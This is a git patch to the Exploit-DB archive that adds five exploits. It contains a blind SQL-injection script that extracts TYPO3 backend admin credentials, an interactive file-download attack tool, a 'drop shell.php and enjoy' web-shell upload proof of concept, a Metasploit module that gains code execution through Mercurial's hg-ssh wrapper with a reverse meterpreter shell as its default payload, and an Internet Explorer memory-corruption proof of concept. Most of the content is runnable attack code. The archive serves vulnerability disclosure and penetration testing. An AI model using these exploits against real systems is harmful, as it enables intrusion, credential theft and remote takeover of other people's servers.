From 72f98fab1ccae1b746ebdcc7bacf34622c08bbd8 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 28 Apr 2017 05:01:19 +0000
Subject: [PATCH] DB: 2017-04-28

5 new exploits

Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption

Microsoft Office Word - Malicious Hta Execution (Metasploit)
Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)

Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)
TYPO3 News Module - SQL Injection
Simple File Uploader - Arbitrary File Download
Easy File Uploader - Arbitrary File Upload
---
 files.csv                        |   7 +-
 platforms/php/webapps/41940.py   | 139 +++++++++++++++++++++++++++++++
 platforms/php/webapps/41943.py   | 100 ++++++++++++++++++++++
 platforms/php/webapps/41944.txt  |  13 +++
 platforms/python/remote/41942.rb | 131 +++++++++++++++++++++++++++++
 platforms/windows/dos/41941.html |  77 +++++++++++++++++
 6 files changed, 466 insertions(+), 1 deletion(-)
 create mode 100755 platforms/php/webapps/41940.py
 create mode 100755 platforms/php/webapps/41943.py
 create mode 100755 platforms/php/webapps/41944.txt
 create mode 100755 platforms/python/remote/41942.rb
 create mode 100755 platforms/windows/dos/41941.html

diff --git a/files.csv b/files.csv
index 9d89d5072..cc2ae02c5 100644
--- a/files.csv
+++ b/files.csv
@@ -5478,6 +5478,7 @@ id,file,description,date,author,platform,type,port
 41911,platforms/windows/dos/41911.py,"Easy MOV Converter 1.4.24 - Local Buffer Overflow (SEH)",2017-03-12,Muhann4d,windows,dos,0
 41931,platforms/multiple/dos/41931.html,"Apple Safari - Array concat Memory Corruption",2017-04-25,"Google Security Research",multiple,dos,0
 41932,platforms/multiple/dos/41932.cpp,"Oracle VirtualBox Guest Additions 5.1.18 -  Unprivileged Windows User-Mode Guest Code Double-Free",2017-04-25,"Google Security Research",multiple,dos,0
+41941,platforms/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -15470,8 +15471,9 @@ id,file,description,date,author,platform,type,port
 41903,platforms/windows/remote/41903.txt,"Microsoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution",2017-04-20,"Google Security Research",windows,remote,0
 41910,platforms/linux/remote/41910.sh,"SquirrelMail < 1.4.22 - Remote Code Execution",2017-04-23,"Dawid Golunski",linux,remote,0
 41929,platforms/windows/remote/41929.py,"Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution",2017-04-25,vportal,windows,remote,0
-41934,platforms/windows/remote/41934.rb,"Microsoft Office Word - Malicious Hta Execution (Metasploit)",2017-04-25,Metasploit,windows,remote,0
+41934,platforms/windows/remote/41934.rb,"Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)",2017-04-25,Metasploit,windows,remote,0
 41935,platforms/hardware/remote/41935.rb,"WePresent WiPG-1000 - Command Injection (Metasploit)",2017-04-25,Metasploit,hardware,remote,80
+41942,platforms/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,python,remote,22
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37789,3 +37791,6 @@ id,file,description,date,author,platform,type,port
 41930,platforms/php/webapps/41930.txt,"Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0
 41936,platforms/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80
 41939,platforms/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",php,webapps,0
+41940,platforms/php/webapps/41940.py,"TYPO3 News Module - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80
+41943,platforms/php/webapps/41943.py,"Simple File Uploader - Arbitrary File Download",2017-04-27,"Daniel Godoy",php,webapps,0
+41944,platforms/php/webapps/41944.txt,"Easy File Uploader - Arbitrary File Upload",2017-04-27,"Daniel Godoy",php,webapps,0
diff --git a/platforms/php/webapps/41940.py b/platforms/php/webapps/41940.py
new file mode 100755
index 000000000..93d042ffe
--- /dev/null
+++ b/platforms/php/webapps/41940.py
@@ -0,0 +1,139 @@
+# Exploit Title: TYPO3 News Module SQL Injection
+# Vendor Homepage: https://typo3.org/extensions/repository/view/news
+# Exploit Author: Charles FOL
+# Contact: https://twitter.com/ambionics
+# Website: https://www.ambionics.io/blog/typo3-news-module-sqli
+
+
+#!/usr/bin/python3
+
+# TYPO3 News Module SQL Injection Exploit
+# https://www.ambionics.io/blog/typo3-news-module-sqli
+# cf
+#
+# The injection algorithm is not optimized, this is just meant to be a POC.
+#
+
+import requests
+import string
+
+ 
+session = requests.Session()
+session.proxies = {'http': 'localhost:8080'}
+
+
+# Change this
+URL = 'http://vmweb/typo3/index.php?id=8&no_cache=1'
+PATTERN0 = 'Article #1'
+PATTERN1 = 'Article #2'
+
+FULL_CHARSET = string.ascii_letters + string.digits + '$./'
+
+
+def blind(field, table, condition, charset):
+
+    # We add 9 so that the result has two digits
+
+    # If the length is superior to 100-9 it won't work
+
+    size = blind_size(
+
+        'length(%s)+9' % field, table, condition,
+
+        2, string.digits
+
+    )
+
+    size = int(size) - 9
+
+    data = blind_size(
+
+        field, table, condition,
+
+        size, charset
+
+    )
+
+    return data
+
+
+def select_position(field, table, condition, position, char):
+
+    payload = 'select(%s)from(%s)where(%s)' % (
+
+        field, table, condition
+
+    )
+
+    payload = 'ord(substring((%s)from(%d)for(1)))' % (payload, position)
+
+    payload = 'uid*(case((%s)=%d)when(1)then(1)else(-1)end)' % (
+
+        payload, ord(char)
+
+    )
+
+    return payload
+
+
+def blind_size(field, table, condition, size, charset):
+
+    string = ''
+
+    for position in range(size):
+
+        for char in charset:
+
+            payload = select_position(field, table, condition, position+1, char)
+
+            if test(payload):
+
+                string += char
+
+                print(string)
+
+                break
+
+        else:
+
+            raise ValueError('Char was not found')
+
+ 
+
+    return string
+
+
+def test(payload):
+
+    response = session.post(
+
+        URL,
+
+        data=data(payload)
+
+    )
+
+    response = response.text
+
+    return response.index(PATTERN0) < response.index(PATTERN1)
+
+def data(payload):
+
+    return {
+
+        'tx_news_pi1[overwriteDemand][order]': payload,
+
+        'tx_news_pi1[overwriteDemand][OrderByAllowed]': payload,
+
+        'tx_news_pi1[search][subject]': '',
+
+        'tx_news_pi1[search][minimumDate]': '2016-01-01',
+
+        'tx_news_pi1[search][maximumDate]': '2016-12-31',
+
+    }
+
+# Exploit
+
+print("USERNAME:", blind('username', 'be_users', 'uid=1', string.ascii_letters))
+print("PASSWORD:", blind('password', 'be_users', 'uid=1', FULL_CHARSET))
\ No newline at end of file
diff --git a/platforms/php/webapps/41943.py b/platforms/php/webapps/41943.py
new file mode 100755
index 000000000..06e2e2f82
--- /dev/null
+++ b/platforms/php/webapps/41943.py
@@ -0,0 +1,100 @@
+# Exploit Title: Simple File Uploader - Arbitrary File Download 
+# Date: 27/04/2017
+# Exploit Author: Daniel Godoy
+# Vendor Homepage: https://codecanyon.net/
+# Software Link: https://codecanyon.net/item/simple-file-uploader-explorer-and-manager-php-based-secured-file-manager/18393053
+# Tested on: GNU/Linux
+# GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team
+
+
+
+
+POC
+
+#!/usr/bin/env python
+#https://pastebin.com/HeT7RuRU
+import os,re,requests,time,base64
+os.system('clear') 
+
+BLUE = '\033[94m'
+RED = '\033[91m'
+GREEN = '\033[32m'
+CYAN = "\033[96m"
+WHITE = "\033[97m"
+YELLOW = "\033[93m"
+MAGENTA = "\033[95m"
+GREY = "\033[90m"
+DEFAULT = "\033[0m"
+
+def banner():
+	print WHITE+""
+	print "                                              ##          ## "
+	print "                                                ##      ##    "     
+	print "                                              ############## "
+	print "                                            ####  ######  #### "
+	print "                                          ###################### "
+	print "                                          ##  ##############  ##     "
+	print "                                          ##  ##          ##  ## "
+	print "                                                ####  ####"
+	print ""
+
+def details():
+	print WHITE+"                              =[" + YELLOW + "Simple File Uploader Download Tool v1.0.0 "
+	print ""
+
+def core_commands():
+	os.system('clear')
+	print WHITE+'''Core Commands\n===============\n
+Command\t\t\tDescription\n-------\t\t\t-----------\n
+?\t\t\tHelp menu
+quit\t\t\tExit the console
+info\t\t\tDisplay information
+download\t\t\tExploit Vulnerability
+
+	'''
+
+def about():
+	os.system('clear')
+	print WHITE+'''Simple File Uploader Download Tool v1.0.0 \n===============\n
+Author\t\t\tDescription\n-------\t\t\t-----------\n
+Daniel Godoy\t\thttps://www.exploit-db.com/author/?a=3146
+	'''
+
+def download():
+	other = 'a'
+	while other != 'n':
+			urltarget = str(raw_input(WHITE+'Target: '))
+			filename =  str(raw_input(WHITE+'FileName: '))
+			filename =  base64.b64encode(filename)
+			print RED+"[x]Sending Attack: "+WHITE+urltarget+'download.php?id='+filename
+			final = urltarget+'download.php?id='+filename
+			r = requests.get(final)
+			print r.text
+			other = str(raw_input(WHITE+'Test other file? y/n: '))
+			if other == "n":
+				print "Type quit to exit. Bye!"
+
+
+
+banner()
+details()
+
+option='0'
+while option != 0:
+	option = (raw_input(RED+"pwn" + WHITE +" > "))
+	if option == "quit":
+		os.system('clear')
+		option = 0
+	elif option == "?":
+		core_commands()
+	elif option == "help":
+		core_commands()
+	elif option == "about":
+		about()
+	elif option == "download":
+		download()
+	elif option == "info":
+		about()
+	else:
+		print "Not a valid option! Need help? Press ? to display core commands " +GREEN
+
diff --git a/platforms/php/webapps/41944.txt b/platforms/php/webapps/41944.txt
new file mode 100755
index 000000000..63fb305f7
--- /dev/null
+++ b/platforms/php/webapps/41944.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Easy File Uploader  - Arbitrary File Upload
+# Date: 27/04/2017
+# Exploit Author: Daniel Godoy
+# Vendor Homepage: https://codecanyon.net/
+# Software Link: https://codecanyon.net/item/easy-file-uploader-php-multiple-uploader-with-file-manager/17222287
+# Tested on: GNU/Linux
+# GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team
+
+
+POC
+
+Drop file php (shell.php) to upload.
+access to http://poc_site/fileFolder/shell.php and enjoy!
diff --git a/platforms/python/remote/41942.rb b/platforms/python/remote/41942.rb
new file mode 100755
index 000000000..381a4d497
--- /dev/null
+++ b/platforms/python/remote/41942.rb
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::SSH
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Mercurial Custom hg-ssh Wrapper Remote Code Exec",
+      'Description'    => %q{
+        This module takes advantage of custom hg-ssh wrapper implementations that don't
+        adequately validate parameters passed to the hg binary, allowing users to trigger a
+        Python Debugger session, which allows arbitrary Python code execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'claudijd',
+        ],
+      'References'     =>
+        [
+          ['URL',   'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29']
+        ],
+      'DefaultOptions' =>
+        {
+          'Payload' => 'python/meterpreter/reverse_tcp',
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [ ['Automatic', {}] ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Apr 18 2017",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        Opt::RHOST(),
+        Opt::RPORT(22),
+        OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
+        OptPath.new('SSH_PRIV_KEY_FILE', [ true, 'The path to private key for ssh auth', '' ]),
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+  def rhost
+    datastore['RHOST']
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def ssh_priv_key
+    File.read(datastore['SSH_PRIV_KEY_FILE'])
+  end
+
+  def exploit
+    factory = ssh_socket_factory
+    ssh_options = {
+      auth_methods: ['publickey'],
+      config: false,
+      use_agent: false,
+      key_data: [ ssh_priv_key ],
+      port: rport,
+      proxy: factory,
+      non_interactive:  true
+    }
+
+    ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+    print_status("#{rhost}:#{rport} - Attempting to login...")
+
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(rhost, username, ssh_options)
+      end
+    rescue Rex::ConnectionError
+      return
+    rescue Net::SSH::Disconnect, ::EOFError
+      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      return
+    rescue ::Timeout::Error
+      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      return
+    rescue Net::SSH::AuthenticationFailed
+      print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
+    rescue Net::SSH::Exception => e
+      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      return
+    end
+
+    if ssh
+      print_good("SSH connection is established.")
+      ssh.open_channel do |ch|
+        ch.exec "hg -R --debugger serve --stdio" do |ch, success|
+          ch.on_extended_data do |ch, type, data|
+            if data.match(/entering debugger/)
+              print_good("Triggered Debugger (#{data})")
+              ch.send_data "#{payload.encoded}\n"
+            else
+              print_bad("Unable to trigger debugger (#{data})")
+            end
+          end
+        end
+      end
+
+      begin
+        ssh.loop unless session_created?
+      rescue Errno::EBADF => e
+        elog(e.message)
+      end
+    end
+  end
+end
\ No newline at end of file
diff --git a/platforms/windows/dos/41941.html b/platforms/windows/dos/41941.html
new file mode 100755
index 000000000..89497670b
--- /dev/null
+++ b/platforms/windows/dos/41941.html
@@ -0,0 +1,77 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1118
+
+There is a memory corruption vulnerability in Internet Explorer. The vulnerability was confirmed on Internet Explorer Version 11.576.14393.0 (Update Version 11.0.38) running on Windows 10 64-bit with page heap enabled for iexplore.exe process.
+
+PoC:
+
+===========================================================
+-->
+
+<!-- saved from url=(0014)about:internet -->
+<style>
+#details { transition-duration: 61s; }
+</style>
+<script>
+function go() {
+  document.fgColor = "foo";
+  m.setAttribute("foo", "bar");
+  document.head.innerHTML = "a";
+}
+</script>
+<body onload=go()>
+<details id="details">
+<summary style="transform: scaleY(4)">
+<marquee id="m" bgcolor="rgb(135,114,244)">aaaaaaaaaaaaa</marquee>
+<style></style>
+
+<!--
+===========================================================
+
+The crash happens in CStyleSheetArray::BuildListOfMatchedRules while attempting to read memory outside of the bounds of the object pointed by eax (possibly due to a type confusion issue, but I didn't investigate in detail). If that read is successful and attacker-controlled address is read into edi, this down the line leads to a write at the attacker controlled address in CStyleSheetArray::BuildListOfProbableRules. Thus it might be possible to turn the issue into code execution.
+
+Debug info:
+
+(d10.1504): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770
+eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
+MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:
+71eb1137 8bb824010000    mov     edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????
+
+0:021> r
+eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770
+eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
+MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:
+71eb1137 8bb824010000    mov     edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????
+
+0:021> k
+ # ChildEBP RetAddr  
+00 173ddaa4 71eb3674 MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77
+01 173ddd6c 71eb041e MSHTML!CElement::ApplyStyleSheets+0x504
+02 173ddd9c 720b43e5 MSHTML!CElement::ApplyDefaultFormat+0x8e
+03 173de1b0 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0xe25
+04 173de248 720b343a MSHTML!CElement::ComputeFormats+0x374
+05 173de274 720b36cd MSHTML!CFormatInfo::FindFormattingParent+0x45a
+06 173de690 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0x10d
+07 173de738 71ede88b MSHTML!CElement::ComputeFormats+0x374
+08 173de754 71ede3c4 MSHTML!CTreeNode::ComputeFormats+0x6b
+09 173df3b0 722e4e79 MSHTML!CTreeNode::ComputeFormatsHelper+0x34
+0a 173df3b8 7201745c MSHTML!CTreeNode::GetSvgFormatHelper+0xa
+0b 173df3c0 72756588 MSHTML!Tree::Style::HasCompositionItems+0x26
+0c 173df3cc 72787473 MSHTML!Layout::InlineLayout::HasCompositionItems+0x28
+0d 173df5dc 72788c30 MSHTML!CDispScroller::CalcScrollBits+0x526
+0e 173df6c8 72246c2a MSHTML!CDispScroller::InvalidateScrollDelta+0x147
+0f 173df6f4 71d8174e MSHTML!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xf8a1a
+10 173df710 71d81667 MSHTML!CRenderTaskApplyPSP::ProcessScrollerUpdateRequests+0x34
+11 173df740 71f0e9bb MSHTML!CRenderTaskApplyPSP::Execute+0xe7
+12 173df79c 71de27d3 MSHTML!CRenderThread::RenderThread+0x31b
+13 173df7ac 72fa17cd MSHTML!CRenderThread::StaticRenderThreadProc+0x23
+14 173df7e4 74c362c4 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x8d
+15 173df7f8 77700fd9 KERNEL32!BaseThreadInitThunk+0x24
+16 173df840 77700fa4 ntdll!__RtlUserThreadStart+0x2f
+17 173df850 00000000 ntdll!_RtlUserThreadStart+0x1b
+-->
\ No newline at end of file